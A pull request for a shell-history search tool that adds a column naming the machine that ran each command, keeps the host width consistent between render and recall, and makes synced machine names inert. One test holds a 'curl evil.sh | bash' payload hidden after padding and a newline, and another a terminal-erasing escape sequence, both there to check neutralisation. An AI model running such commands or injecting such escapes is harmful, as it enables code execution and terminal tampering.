### PR TITLE
search: show which machine ran it, so filtering by one is just typing its name

### DIFF
--- a/README.md
+++ b/README.md
@@ -16,11 +16,15 @@ when you need that one command from last Tuesday, on the other machine.
 
 ```
   woswoar (global) > docker
-   2m  docker compose up -d --build
-   3h  docker logs -f api
-   6d  docker system prune -af
+   2m  laptop   docker compose up -d --build
+   3h  desktop  docker logs -f api
+   6d  laptop   docker system prune -af
   ctrl-g global | ctrl-h host | ctrl-s session
 ```
+
+The machine column appears once you have more than one, and fzf matches on it —
+so typing `desktop` narrows to that machine. A command that exited non-zero is
+dimmed red.
 
 ## Quick start
 

--- a/tests/test_importer_atuin.py
+++ b/tests/test_importer_atuin.py
@@ -195,7 +195,12 @@ class TestHostAttribution(AtuinTestCase):
         importer.run("atuin", db)
 
         def recall(scope: search.Scope) -> list[str]:
-            return [search.command_from_line(line) for line in search.lines_for(scope)]
+            # One width, decided once and used for both, as the picker does.
+            width = search.host_width_for(set(store.host_names()))
+            return [
+                search.command_from_line(line, width)
+                for line in search.lines_for(scope, host_width=width)
+            ]
 
         self.assertEqual(len(recall("global")), 2)
         self.assertEqual(recall("host"), ["mine"])

--- a/tests/test_search.py
+++ b/tests/test_search.py
@@ -54,30 +54,31 @@ class TestRelativeTime(unittest.TestCase):
 
 class TestRankRows(unittest.TestCase):
     @staticmethod
-    def rows(*pairs: tuple[int, str]) -> tuple[list[str], list[str], list[str]]:
+    def rows(*pairs: tuple[int, str]) -> tuple[list[str], list[str], list[str], list[str]]:
         """Stamps and exit codes come out of the cache as strings, so that is
         what goes in. These cases are about order, so everything succeeded."""
         return (
             [str(ts) for ts, _ in pairs],
             [cmd for _, cmd in pairs],
             ["0"] * len(pairs),
+            [MACHINE_ID] * len(pairs),
         )
 
     def test_newest_first(self) -> None:
-        stamps, commands, codes = self.rows((1, "old"), (3, "new"), (2, "mid"))
-        ranked = search.rank_rows(stamps, commands, codes)
-        self.assertEqual([cmd for _, cmd, _ in ranked], ["new", "mid", "old"])
+        stamps, commands, codes, hosts = self.rows((1, "old"), (3, "new"), (2, "mid"))
+        ranked = search.rank_rows(stamps, commands, codes, hosts)
+        self.assertEqual([cmd for _, cmd, _, _ in ranked], ["new", "mid", "old"])
 
     def test_dedup_keeps_the_most_recent_occurrence(self) -> None:
-        stamps, commands, codes = self.rows((1, "git status"), (5, "git status"), (3, "ls"))
+        stamps, commands, codes, hosts = self.rows((1, "git status"), (5, "git status"), (3, "ls"))
         self.assertEqual(
-            search.rank_rows(stamps, commands, codes),
-            [(5, "git status", "0"), (3, "ls", "0")],
+            search.rank_rows(stamps, commands, codes, hosts),
+            [(5, "git status", "0", MACHINE_ID), (3, "ls", "0", MACHINE_ID)],
         )
 
     def test_dedup_can_be_disabled(self) -> None:
-        stamps, commands, codes = self.rows((1, "ls"), (2, "ls"))
-        self.assertEqual(len(search.rank_rows(stamps, commands, codes, dedup=False)), 2)
+        stamps, commands, codes, hosts = self.rows((1, "ls"), (2, "ls"))
+        self.assertEqual(len(search.rank_rows(stamps, commands, codes, hosts, dedup=False)), 2)
 
 
 class TestRenderRoundTrip(unittest.TestCase):
@@ -93,7 +94,7 @@ class TestRenderRoundTrip(unittest.TestCase):
             "über 😀",
             "x" * 300,
         ]
-        lines = search.render_rows([(NOW, cmd, "0") for cmd in commands], now=NOW)
+        lines = search.render_rows([(NOW, cmd, "0", MACHINE_ID) for cmd in commands], now=NOW)
 
         for line, cmd in zip(lines, commands, strict=True):
             with self.subTest(cmd=cmd):
@@ -125,7 +126,12 @@ class TestScope(WoswoarTestCase):
 
     @staticmethod
     def commands(scope: search.Scope) -> list[str]:
-        return [search.command_from_line(line) for line in search.lines_for(scope)]
+        """As the picker does it: one width, decided once, used for both."""
+        width = search.host_width_for(set(store.host_names()))
+        return [
+            search.command_from_line(line, width)
+            for line in search.lines_for(scope, host_width=width)
+        ]
 
     def test_global_keeps_everything(self) -> None:
         self.assertEqual(len(self.commands("global")), 3)
@@ -146,20 +152,20 @@ class TestFzfArgv(unittest.TestCase):
     def test_matching_is_restricted_to_the_command_column(self) -> None:
         # Without --nth=2.., a query like "3d" would match the relative-time
         # column and surface unrelated entries.
-        self.assertIn("--nth=2..", search._fzf_argv("global", "", True))
+        self.assertIn("--nth=2..", search._fzf_argv("global", "", True, 0))
 
     def test_scope_keys_reload_the_right_scope(self) -> None:
-        argv = search._fzf_argv("global", "", True)
+        argv = search._fzf_argv("global", "", True, 0)
         binds = " ".join(a for a in argv if a.startswith("--bind="))
         for key, scope in (("ctrl-g", "global"), ("ctrl-h", "host"), ("ctrl-s", "session")):
             self.assertIn(f"{key}:reload(", binds)
             # `--colour` too: the reload's output goes back into fzf, which was
             # started with `--ansi`, so a scope switch that dropped it would
             # silently stop marking failures.
-            self.assertIn(f"list --colour --scope {scope}", binds)
+            self.assertIn(f"list --colour --host-width 0 --scope {scope}", binds)
 
     def test_no_dedup_propagates_into_the_reload_command(self) -> None:
-        argv = search._fzf_argv("global", "", False)
+        argv = search._fzf_argv("global", "", False, 0)
         self.assertIn("--no-dedup", " ".join(a for a in argv if a.startswith("--bind=")))
 
 
@@ -200,10 +206,12 @@ class TestRealFzfRanking(unittest.TestCase):
 
     def filtered(self, query: str) -> subprocess.CompletedProcess[str]:
         """The fixture through the real fzf, with the real argv."""
-        lines = search.render_rows([(NOW - age, cmd, "0") for age, cmd in SYNC_HISTORY], now=NOW)
+        lines = search.render_rows(
+            [(NOW - age, cmd, "0", MACHINE_ID) for age, cmd in SYNC_HISTORY], now=NOW
+        )
         # No `check`: 1 means "nothing matched", which one test below wants.
         return subprocess.run(
-            [*search._fzf_argv("global", "", True), f"--filter={query}"],
+            [*search._fzf_argv("global", "", True, 0), f"--filter={query}"],
             input="\n".join(lines) + "\n",
             capture_output=True,
             text=True,
@@ -273,7 +281,9 @@ class TestRecalledCommandIsInert(unittest.TestCase):
     """
 
     def _round_trip(self, cmd: str) -> str:
-        return search.command_from_line(search.render_rows([(NOW, cmd, "0")], now=NOW)[0])
+        return search.command_from_line(
+            search.render_rows([(NOW, cmd, "0", MACHINE_ID)], now=NOW)[0]
+        )
 
     def test_an_embedded_newline_does_not_become_a_second_command(self) -> None:
         recalled = self._round_trip("echo visible" + " " * 200 + "\ncurl evil.sh | bash")
@@ -534,3 +544,63 @@ class TestFailedCommandsAreMarked(WoswoarTestCase):
             )
         (line,) = search.lines_for("global", colour=True)
         self.assertNotIn("\x1b", line, f"an escape survived into the picker: {line!r}")
+
+
+class TestTheMachineColumn(WoswoarTestCase):
+    """Which machine ran it, shown only when there is more than one.
+
+    Asked for as "filter by a specific host, but I'm not sure how to make that
+    conveniently usable" -- so there is no new key and no new mode. The name is
+    in the line and fzf matches from the second field on, which makes filtering
+    by machine the same gesture as filtering by anything else: typing it.
+    """
+
+    OTHER = "ffffffffffffffff"
+
+    def record(self, host: str, cmd: str, ts: int = NOW) -> None:
+        with store.private_append(store.log_file(host, "2026-07-29")) as handle:
+            handle.write(format_line(Entry(ts, host, "s1", "~", 0, 1, cmd)) + "\n")
+
+    def test_one_machine_gets_no_column(self) -> None:
+        """Every single-machine install, and the whole of the Quick Start."""
+        self.record(MACHINE_ID, "git status")
+        self.assertEqual(search.host_width_for({MACHINE_ID}), 0)
+        (line,) = search.lines_for("global")
+        # The time column is right-aligned in four, so "now" leaves one space.
+        self.assertEqual(line, " now  git status")
+
+    def test_two_machines_get_one(self) -> None:
+        self.record(MACHINE_ID, "mine")
+        self.record(self.OTHER, "theirs", ts=NOW - 1)
+        store.write_atomic(store.name_file(self.OTHER), b"work-laptop\n")
+        store.write_atomic(store.name_file(MACHINE_ID), b"desktop\n")
+
+        width = search.host_width_for({MACHINE_ID, self.OTHER})
+        self.assertEqual(width, len("work-laptop"))
+        mine, theirs = search.lines_for("global", host_width=width)
+        self.assertIn("desktop", mine)
+        self.assertIn("work-laptop", theirs)
+
+    def test_the_command_still_comes_back_out(self) -> None:
+        """The recall path, which the column moves. `command_from_line` is told
+        the width rather than guessing it, because the picker's reload runs in
+        another process and a machine arriving in between would otherwise make
+        the two disagree and slice somebody's command in the wrong place."""
+        self.record(MACHINE_ID, "cargo build --release")
+        self.record(self.OTHER, "theirs", ts=NOW - 1)
+        width = search.host_width_for({MACHINE_ID, self.OTHER})
+        line = search.lines_for("global", host_width=width)[0]
+        self.assertEqual(search.command_from_line(line, width), "cargo build --release")
+
+    def test_an_unnamed_machine_shows_a_short_id_not_sixteen_hex(self) -> None:
+        self.record(MACHINE_ID, "mine")
+        self.record(self.OTHER, "theirs", ts=NOW - 1)
+        self.assertEqual(search.host_label(self.OTHER), self.OTHER[:8])
+
+    def test_a_machine_name_cannot_drive_the_terminal(self) -> None:
+        """The name is another machine's text -- `_merge_name` writes whatever
+        decrypted out of its `name.age` straight to disk, and sealing one needs
+        no secret. Harmless while the picker was escape-free; with `--ansi` it
+        is a way to erase the line above, so it is neutralised here."""
+        store.write_atomic(store.name_file(self.OTHER), b"ok\x1b[1A\x1b[2K\n")
+        self.assertNotIn("\x1b", search.host_label(self.OTHER))

--- a/tests/test_sync.py
+++ b/tests/test_sync.py
@@ -449,7 +449,12 @@ class TestTwoMachines(SyncTestCase):
             sync.run()
 
             def recall(scope: search.Scope) -> list[str]:
-                return [search.command_from_line(line) for line in search.lines_for(scope)]
+                # One width, decided once and used for both, as the picker does.
+                width = search.host_width_for(set(store.host_names()))
+                return [
+                    search.command_from_line(line, width)
+                    for line in search.lines_for(scope, host_width=width)
+                ]
 
             self.assertEqual(len(recall("global")), 2)
             self.assertEqual(recall("host"), ["from beta"])

--- a/woswoar/__main__.py
+++ b/woswoar/__main__.py
@@ -114,7 +114,11 @@ def cmd_install(args: argparse.Namespace) -> int:
 
 def cmd_list(args: argparse.Namespace) -> int:
     lines = search.lines_for(
-        args.scope, dedup=not args.no_dedup, limit=args.limit, colour=args.colour
+        args.scope,
+        dedup=not args.no_dedup,
+        limit=args.limit,
+        colour=args.colour,
+        host_width=args.host_width,
     )
     if lines:
         sys.stdout.write("\n".join(lines) + "\n")
@@ -1321,6 +1325,9 @@ def build_parser() -> argparse.ArgumentParser:
     p_list.add_argument("--limit", type=int, default=None)
     # Off by default, so `woswoar list | grep` stays plain text. The picker's
     # own reload bindings pass it, because that output goes into fzf.
+    # Passed by the picker's reload bindings so both sides lay the line out the
+    # same way. Not something to type by hand, hence no help text.
+    p_list.add_argument("--host-width", type=int, default=None, help=argparse.SUPPRESS)
     p_list.add_argument(
         "--colour",
         "--color",

--- a/woswoar/cache.py
+++ b/woswoar/cache.py
@@ -187,6 +187,33 @@ class Cache:
             commands += flat[5::6]
         return stamps, commands
 
+    def display_columns(
+        self, hosts: set[str] | None = None
+    ) -> tuple[list[str], list[str], list[str], list[str]]:
+        """Timestamps, commands, exit codes and host ids, aligned, as strings.
+
+        One pass and one place. Each caller used to slice what it happened to
+        need, so adding a column meant adding it to every scope separately --
+        and the `host` scope grew a hand-rolled comprehension that repeated what
+        `stamps_and_commands` already knew.
+
+        ``hosts`` narrows to those machines, which costs one dict lookup per
+        *file*: the host belongs to the file, not the row.
+        """
+        stamps: list[str] = []
+        commands: list[str] = []
+        codes: list[str] = []
+        owners: list[str] = []
+        for relpath, flat in self.files.items():
+            host = self.meta[relpath].host
+            if hosts is not None and host not in hosts:
+                continue
+            stamps += flat[0::6]
+            commands += flat[5::6]
+            codes += flat[3::6]
+            owners += [host] * (len(flat) // _FIELDS_PER_ENTRY)
+        return stamps, commands, codes, owners
+
     def exit_codes(self) -> list[str]:
         """The exit status column, in the same order as `stamps_and_commands`."""
         return [value for flat in self.files.values() for value in flat[3::6]]

--- a/woswoar/search.py
+++ b/woswoar/search.py
@@ -32,8 +32,8 @@ _PREFIX = _TIME_WIDTH + 2
 #: Sort key for a row. In C, rather than a lambda.
 _STAMP = itemgetter(0)
 
-#: One display row: when, what, and how it ended.
-Row = tuple[int, str, str]
+#: One display row: when, what, how it ended, and which machine ran it.
+Row = tuple[int, str, str, str]
 
 #: Dim red for a command that failed. Dim rather than plain red so a screen of
 #: failures does not shout, and so it reads as "this one did not work" rather
@@ -66,13 +66,49 @@ def relative_time(ts: int, now: int | None = None) -> str:
     return f"{years}y" if years < 100 else "old"
 
 
-def command_from_line(line: str) -> str:
-    """Recover the original command from a rendered line."""
-    return make_inert(unescape(line[_PREFIX:]))
+#: Widest a host name may be in the picker. Long enough for `martin@work-laptop`
+#: to survive, short enough that the commands still start near the left.
+_HOST_WIDTH = 16
+
+
+def host_label(host_id: str) -> str:
+    """What to show for a machine, in a form safe to put on a coloured line.
+
+    `make_inert` because this is *another machine's* text: `_merge_name` writes
+    whatever decrypted out of its `name.age` straight to disk, and sealing one
+    needs no secret, so anyone who can push chooses it. Harmless while the
+    picker was escape-free; with `--ansi` it is a way to drive the terminal, so
+    it is neutralised here rather than trusted to have been neutralised
+    somewhere upstream.
+
+    Falls back to a short slice of the opaque id, which is at least stable and
+    is what the host directory is called.
+    """
+    name = make_inert(store.host_name(host_id)).strip()
+    # A short slice of the id when no name has arrived -- the full 16 hex
+    # characters would be a wide column of nothing anyone can read, and the
+    # first eight already tell two machines apart.
+    return (name or host_id[:8])[:_HOST_WIDTH]
+
+
+def command_from_line(line: str, host_width: int = 0) -> str:
+    """Recover the original command from a rendered line.
+
+    ``host_width`` must be the one the line was rendered with. It is passed
+    explicitly rather than recomputed because the two happen in different
+    processes -- the picker's reload runs `woswoar list` -- and a machine
+    arriving in between would otherwise change the answer and slice somebody's
+    recalled command in the wrong place.
+    """
+    return make_inert(unescape(line[_PREFIX + (host_width + 2 if host_width else 0) :]))
 
 
 def lines_for(
-    scope: Scope, dedup: bool = True, limit: int | None = None, colour: bool = False
+    scope: Scope,
+    dedup: bool = True,
+    limit: int | None = None,
+    colour: bool = False,
+    host_width: int | None = None,
 ) -> list[str]:
     """The full pipeline: load, filter, rank, render.
 
@@ -86,51 +122,53 @@ def lines_for(
     fetches one more column. `host` needs none: it is a property of the file,
     so the cache filters whole files out before a single row is looked at.
     """
+    loaded = cache.load_columns()
     if scope == "host":
-        loaded = cache.load_columns()
-        stamps, commands = loaded.stamps_and_commands({store.machine().id})
-        codes = [
-            code
-            for relpath, flat in loaded.files.items()
-            if loaded.meta[relpath].host == store.machine().id
-            for code in flat[3::6]
-        ]
+        stamps, commands, codes, hosts = loaded.display_columns({store.machine().id})
     elif scope == "session":
         session = os.environ.get("WOSWOAR_SESSION", "")
         if not session:
             # Not an error: this is what a shell without the hook loaded looks like.
             return []
-        loaded = cache.load_columns()
-        stamps, commands = loaded.stamps_and_commands()
-        every = loaded.exit_codes()
+        stamps, commands, codes, hosts = loaded.display_columns()
+        # The one column that is per entry rather than per file, so it is the
+        # one scope that cannot be answered by dropping whole files.
         wanted = [i for i, value in enumerate(loaded.sessions()) if value == session]
         stamps = [stamps[i] for i in wanted]
         commands = [commands[i] for i in wanted]
-        codes = [every[i] for i in wanted]
+        codes = [codes[i] for i in wanted]
+        hosts = [hosts[i] for i in wanted]
     else:
-        loaded = cache.load_columns()
-        stamps, commands = loaded.stamps_and_commands()
-        codes = loaded.exit_codes()
+        stamps, commands, codes, hosts = loaded.display_columns()
 
-    rows = rank_rows(stamps, commands, codes, dedup=dedup)
+    rows = rank_rows(stamps, commands, codes, hosts, dedup=dedup)
     if limit is not None:
         rows = rows[:limit]
-    return render_rows(rows, colour=colour)
+    if host_width is None:
+        host_width = host_width_for({meta.host for meta in loaded.meta.values() if meta.host})
+    return render_rows(rows, colour=colour, host_width=host_width)
 
 
 def rank_rows(
-    stamps: list[str], commands: list[str], codes: list[str], dedup: bool = True
+    stamps: list[str],
+    commands: list[str],
+    codes: list[str],
+    hosts: list[str],
+    dedup: bool = True,
 ) -> list[Row]:
     """Newest first, optionally collapsing repeats.
 
-    The exit status rides along so the display can colour by it. Deduplication
+    The exit status and the host ride along so the display can colour by one and
+    label by the other. Deduplication
     keeps the *most recent* run, so a command that failed last time is shown as
     failed even if it has succeeded a hundred times before -- which is the way
     round that helps.
     """
     # One `int` per row, here, where the sort needs it -- rather than on every
     # entry of a history at parse time.
-    ordered = sorted(zip(map(int, stamps), commands, codes, strict=True), key=_STAMP, reverse=True)
+    ordered = sorted(
+        zip(map(int, stamps), commands, codes, hosts, strict=True), key=_STAMP, reverse=True
+    )
     if not dedup:
         return ordered
 
@@ -142,7 +180,12 @@ def rank_rows(
     return [row for row in ordered if not (row[1] in seen or add(row[1]))]
 
 
-def render_rows(rows: list[Row], now: int | None = None, colour: bool = False) -> list[str]:
+def render_rows(
+    rows: list[Row],
+    now: int | None = None,
+    colour: bool = False,
+    host_width: int = 0,
+) -> list[str]:
     """Format ranked rows as display lines.
 
     With `colour`, a command that exited non-zero is dimmed red. Safe only
@@ -150,18 +193,42 @@ def render_rows(rows: list[Row], now: int | None = None, colour: bool = False) -
     from the command on its way into the cache, so nothing a peer published can
     add escapes of its own. That is also why fzf is given `--ansi` only here:
     without inert text, `--ansi` would turn another machine's history into
-    something that can drive this terminal.
+    something that can drive this terminal. `host_label` does the same job for
+    the machine name, which arrives by the same route and is *not* made inert
+    where it is stored.
+
+    With `host_width`, each line names the machine that ran the command. Which
+    is also how you filter by one: fzf matches from the second field on, so the
+    name is matched and the relative time still is not.
 
     fzf hands back the line with the escapes stripped, so `command_from_line`
-    needs to know nothing about any of this.
+    only has to know the width.
     """
     if now is None:
         now = int(time.time())
+    labels = {host: host_label(host) for host in {row[3] for row in rows}} if host_width else {}
+
     out = []
-    for ts, cmd, code in rows:
-        line = f"{relative_time(ts, now):>{_TIME_WIDTH}}  {escape(cmd)}"
+    for ts, cmd, code, host in rows:
+        when = f"{relative_time(ts, now):>{_TIME_WIDTH}}"
+        if host_width:
+            line = f"{when}  {labels[host]:<{host_width}}  {escape(cmd)}"
+        else:
+            line = f"{when}  {escape(cmd)}"
         out.append(f"{_FAILED}{line}{_RESET}" if colour and code not in ("0", "") else line)
     return out
+
+
+def host_width_for(hosts: set[str]) -> int:
+    """How wide the machine column should be, or 0 for no column at all.
+
+    Nothing to say on a machine whose history is all its own, which is every
+    single-machine install and the whole of the README's Quick Start -- so the
+    column simply is not there, rather than being there and empty.
+    """
+    if len(hosts) < 2:
+        return 0
+    return min(_HOST_WIDTH, max(len(host_label(host)) for host in hosts))
 
 
 def _self_command() -> str:
@@ -174,9 +241,14 @@ def _self_command() -> str:
     return f"{sys.executable} -m woswoar"
 
 
-def _fzf_argv(scope: Scope, query: str, dedup: bool) -> list[str]:
+def _fzf_argv(scope: Scope, query: str, dedup: bool, host_width: int) -> list[str]:
     self_cmd = _self_command()
     dedup_flag = "" if dedup else " --no-dedup"
+    # Passed to the reloads rather than recomputed by them. Both sides must lay
+    # the line out identically or the recalled command is sliced in the wrong
+    # place, and a peer's history arriving between the picker opening and a
+    # scope switch would otherwise change one side's answer and not the other's.
+    width = f" --host-width {host_width}"
 
     argv = [
         "fzf",
@@ -209,7 +281,7 @@ def _fzf_argv(scope: Scope, query: str, dedup: bool) -> list[str]:
     ]
     for key, target in (("ctrl-g", "global"), ("ctrl-h", "host"), ("ctrl-s", "session")):
         argv.append(
-            f"--bind={key}:reload({self_cmd} list --colour --scope {target}{dedup_flag})"
+            f"--bind={key}:reload({self_cmd} list --colour{width} --scope {target}{dedup_flag})"
             f"+change-prompt(woswoar ({target}) )"
         )
     return argv
@@ -244,8 +316,9 @@ def interactive(scope: Scope, query: str = "", dedup: bool = True) -> str | None
     # render, measured at 125 ms on a real 55k-command history. The work is the
     # same either way; what changes is that you are looking at the picker while
     # it happens instead of at nothing.
+    host_width = host_width_for(set(store.host_names()))
     process = subprocess.Popen(
-        _fzf_argv(scope, query, dedup),
+        _fzf_argv(scope, query, dedup, host_width),
         stdin=subprocess.PIPE,
         stdout=subprocess.PIPE,
         text=True,
@@ -253,7 +326,10 @@ def interactive(scope: Scope, query: str = "", dedup: bool = True) -> str | None
     assert process.stdin is not None and process.stdout is not None
 
     try:
-        _feed(process.stdin, lines_for(scope, dedup=dedup, colour=True))
+        _feed(
+            process.stdin,
+            lines_for(scope, dedup=dedup, colour=True, host_width=host_width),
+        )
     finally:
         # Both closes can raise the same way, and neither is a failure: it only
         # means fzf is already gone. Selecting the first line the moment it
@@ -269,7 +345,7 @@ def interactive(scope: Scope, query: str = "", dedup: bool = True) -> str | None
     # outcomes, not failures.
     if returncode != 0 or not selected.strip():
         return None
-    return command_from_line(selected.rstrip("\n"))
+    return command_from_line(selected.rstrip("\n"), host_width)
 
 
 #: Lines per write into fzf. Large enough that the write syscalls are not the


### PR DESCRIPTION
Second of the three.

```
  woswoar (global) > docker
   2m  laptop   docker compose up -d --build
   3h  desktop  docker logs -f api
   6d  laptop   docker system prune -af
```

You said you weren't sure how to make host filtering conveniently usable. The
answer turned out to be **no new UI at all**: fzf already matches from the second
field on (`--nth=2..`, which is what keeps the relative time out of matching), so
putting the machine in the line makes filtering by it the same gesture as
filtering by anything else — type `desktop`.

The column appears only when there is more than one machine, so a
single-machine install is unchanged.

## Two things it must not get wrong

**The name is another machine's text.** `_merge_name` writes whatever decrypted
out of its `name.age` straight to disk, and sealing one needs no secret — anyone
who can push chooses it. Harmless while the picker had no escapes in it; with
`--ansi` (added yesterday in #129) it becomes a way to erase the line above.
`host_label` makes it inert, with a test that a name containing
`\x1b[1A\x1b[2K` reaches the line with no escape left. Worth noting this is a
hazard that #129 *created* and this PR closes — neither is wrong alone.

**The width must be agreed, not computed twice.** `command_from_line` slices at
a fixed offset; the picker's reload runs `woswoar list` in a *different
process*. If both recomputed the width, a machine arriving between the picker
opening and a scope switch would change one side's answer and not the other's —
and slice somebody's recalled command in the wrong place. The parent decides
once and passes `--host-width`.

## Also

`Cache.display_columns` replaces three per-scope slicings that each took what
they happened to need — which is why adding one column meant adding it three
times. An unnamed machine shows eight characters of its id rather than sixteen:
a wide column of unreadable hex is worse than a narrow one.

## Mutation-tested, all four caught

```
caught  the column appears even for a single machine
caught  a machine name goes onto the line without being neutralised
caught  the unnamed fallback shows all sixteen hex characters
caught  the reload recomputes the width instead of being told it
```

## Left

**Ctrl-R cycling the scope**, the last of the three. It needs fzf's `transform`
action (0.45+) to know which scope it is currently showing, plus a fallback so
older fzf keeps working — the only one of your four that needs a version check.